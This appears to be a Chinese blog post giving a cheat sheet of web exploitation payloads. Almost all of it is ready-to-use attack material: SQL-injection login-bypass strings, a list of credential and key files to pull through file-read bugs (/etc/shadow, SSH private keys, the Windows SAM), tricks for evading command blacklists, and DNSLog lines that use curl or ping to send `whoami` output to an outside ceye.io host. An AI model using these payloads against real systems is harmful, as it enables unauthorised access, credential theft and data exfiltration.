漏洞利用技巧速查

漏洞利用技巧速查

万能密码

' or 1='1
'or'='or'
'or 1=1/*
1' or '1'='1
admin
admin'--
admin' or 1=1--
admin' or 1=1/*
admin' or '1'='1'--
admin' or 'a'='a

任意文件下载/读取

常见敏感文件路径

Windows系统
C:\boot.ini	# 查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml	# IIS配置文件
C:\Windows\repair\sam	# 系统初次安装密码
C:\Program Files\mysql\my.ini	# MySQL系统配置
C:\Program Files\mysql\data\mysql\user.MYD	# MySQL用户密码
C:\Windows\php.ini	# php配置文件
C:\Windows\win.ini	# Windows配置文件
Linux系统
/root/.ssh/authorized_keys	# 公钥文件
/root/.ssh/id_rsa	# 私钥文件
/root/.ssh/known_hosts	# 每个访问计算机用户的公钥
/etc/passwd	# 用户信息
/etc/shadow	# 用户密码信息
/etc/my.conf	# MySQL配置文件
/etc/httpd/conf/httpd.conf	# Apache配置文件
/root/.bash_history	# 历史命令
/root/.mysql_history	# MySQL历史命令
/var/lib/mlocate/mlocate.db	# 全文件路径
/usr/local/app/apache2/conf/httpd.conf	# P、Apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf	# 虚拟网站设置
/usr/local/app/php7/lib/php.ini	# php配置文件
/etc/php5/apache2/php.ini	# Ubuntu默认php配置文件路径

黑名单关键字绕过

字符串拼接绕过

a=c;b=at;c=tex;d=t;$a$b ${c}${d}

环境变量绕过

echo ${SHELLOPTS} 
echo ${SHELLOPTS:3:1} 
${SHELLOPTS:3:1}at${IFS}text

空变量绕过

cat t${x}ext

通配符绕过

/bin/ca? tex? 

DnsLog

Command Execution

Linux
curl http://ip.port.<your_identifier>.ceye.io/`whoami`
ping `whoami`.ip.port.<your_identifier>.ceye.io
Windows
ping %USERNAME%.<your_identifier>.ceye.io
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿凯6666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值